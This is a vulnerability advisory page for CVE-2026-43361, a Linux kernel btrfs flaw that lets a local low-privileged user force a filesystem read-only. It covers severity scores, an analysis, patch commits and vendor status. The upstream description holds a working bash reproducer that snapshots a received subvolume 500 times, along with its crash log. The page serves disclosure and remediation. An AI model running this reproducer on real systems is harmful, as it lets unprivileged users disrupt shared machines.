Skip to main content

Linux Kernel btrfs CVE-2026-43361

| EUVDEUVD-2026-28667 MEDIUM
2026-05-08 Linux GHSA-v9r8-chwp-vmrm
5.5
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
5.5 MEDIUM
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
SUSE
MEDIUM
qualitative
Red Hat
5.5 MEDIUM
qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

5
Analysis Generated
May 26, 2026 - 21:35 vuln.today
CVSS changed
May 15, 2026 - 13:37 NVD
5.5 (MEDIUM)
Patch available
May 08, 2026 - 16:18 EUVD
CVE Published
May 08, 2026 - 14:21 nvd
UNKNOWN (no severity yet)
CVE Published
May 08, 2026 - 14:21 nvd
MEDIUM 5.5

DescriptionCVE.org

In the Linux kernel, the following vulnerability has been resolved:

btrfs: fix transaction abort when snapshotting received subvolumes

Currently a user can trigger a transaction abort by snapshotting a previously received snapshot a bunch of times until we reach a BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we can store in a leaf). This is very likely not common in practice, but if it happens, it turns the filesystem into RO mode. The snapshot, send and set_received_subvol and subvol_setflags (used by receive) don't require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user could use this to turn a filesystem into RO mode and disrupt a system.

Reproducer script:

$ cat test.sh #!/bin/bash

DEV=/dev/sdi MNT=/mnt/sdi

Use smallest node size to make the test faster.

mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT

Create a subvolume and set it to RO so that it can be used for send.

btrfs subvolume create $MNT/sv touch $MNT/sv/foo btrfs property set $MNT/sv ro true

Send and receive the subvolume into snaps/sv.

mkdir $MNT/snaps btrfs send $MNT/sv | btrfs receive $MNT/snaps

Now snapshot the received subvolume, which has a received_uuid, a

lot of times to trigger the leaf overflow.

total=500 for ((i = 1; i <= $total; i++)); do echo -ne "\rCreating snapshot $i/$total" btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null done echo

umount $MNT

When running the test:

$ ./test.sh (...) Create subvolume '/mnt/sdi/sv' At subvol /mnt/sdi/sv At subvol sv Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system

And in dmesg/syslog:

$ dmesg (...) [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252! [251067.629212] ------------[ cut here ]------------ [251067.630033] BTRFS: Transaction aborted (error -75) [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235 [251067.632851] Modules linked in: btrfs dm_zero (...) [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [251067.646165] Tainted: [W]=WARN [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs] [251067.649984] Code: f0 48 0f (...) [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292 [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3 [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750 [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820 [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0 [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5 [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000 [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0 [251067.661972] Call Trace: [251067.662292] <TASK> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs] [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs] [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs] [251067.665238] ? _raw_spin_unlock+0x15/0x30 [251067.665837] ? record_root_ ---truncated---

AnalysisAI

Filesystem denial-of-service in the Linux kernel's btrfs subsystem allows a local low-privileged user to force a mounted btrfs filesystem into read-only mode by repeatedly snapshotting a received subvolume until the BTRFS_UUID_KEY_RECEIVED_SUBVOL B-tree leaf overflows its maximum item size, triggering a transaction abort in create_pending_snapshot(). Critically, the operations involved - snapshot, send, receive, and set_received_subvol - require only inode_owner_or_capable() rather than CAP_SYS_ADMIN, meaning unprivileged users owning subvolumes can mount this attack. No public exploit identified at time of analysis beyond the detailed reproducer script embedded in the advisory itself; EPSS at 0.02% (7th percentile) reflects low widespread automated exploitation probability, though multi-tenant environments face elevated practical risk.

Technical ContextAI

The btrfs filesystem organizes metadata in B-tree structures stored in fixed-size leaves (nodes). Each received subvolume carries a received_uuid, and each snapshot operation appends a BTRFS_UUID_KEY_RECEIVED_SUBVOL item to the corresponding B-tree leaf. These items accumulate without a size guard, and once the leaf reaches its maximum storable item size, the insert fails with EOVERFLOW (error -75). The error propagates to create_pending_snapshot() in fs/btrfs/transaction.c (around line 1907 per dmesg trace), which does not handle EOVERFLOW gracefully and instead calls btrfs_abort_transaction(), flipping the filesystem to read-only mode as a safety measure. With the smallest supported node size of 4K, only approximately 496 snapshot operations are needed to exhaust the leaf. The affected CPE is cpe:2.3:a:linux:linux:*:*:*:*:*:*:*:* with the vulnerability introduced at commit dd5f9615fc5c5e8d3751aab3a17b92768fb1ce70 dating back to Linux 3.12. The CWE field is absent from the NVD entry; the ENISA EUVD tag of 'Buffer Overflow' is imprecise - the actual root cause is an unchecked B-tree leaf item accumulation leading to an unhandled size overflow condition, not a memory buffer overflow.

RemediationAI

Upgrade to a patched Linux kernel version. Vendor-released patches are confirmed at the following stable branches via kernel.org commits: Linux 7.0 (commit bac55dde8efa457e769c934fd88a63f2141ba238), 6.19.9 (commit 9a9227b488ffb7cdbb5d930a01fc6956c05ba61a), 6.18.19 (commit e1b18b959025e6b5dbad668f391f65d34b39595a), 6.12.78 (commit 770af8e465c2c3de528f85e840eab462dd41542b), 6.6.130 (commit 6bce705b699cba9afccb996c77d194fe003dfa2a), and 6.1.167 (commit e3d8efc157bc590457d3e31da403af1a221643d6), all available at https://git.kernel.org/stable/c/. For systems that cannot be patched immediately, restrict unprivileged users from executing btrfs snapshot operations on received subvolumes - this can be achieved by removing user ownership of received subvolumes or leveraging user namespace restrictions to prevent subvolume operations. Disabling btrfs receive workflows for non-administrative users eliminates the attack precondition entirely but may disrupt backup or replication pipelines that depend on btrfs send/receive. Red Hat and SUSE advisories should be consulted for distribution-specific patch availability.

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
SUSE Linux Enterprise Desktop 15 SP7 Fixed
SUSE Linux Enterprise Desktop 15 SP7 Fixed
SUSE Linux Enterprise High Availability Extension 15 SP7 Fixed
SUSE Linux Enterprise High Availability Extension 15 SP7 Fixed
SUSE Linux Enterprise High Performance Computing 15 SP7 Fixed

Share

CVE-2026-43361 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy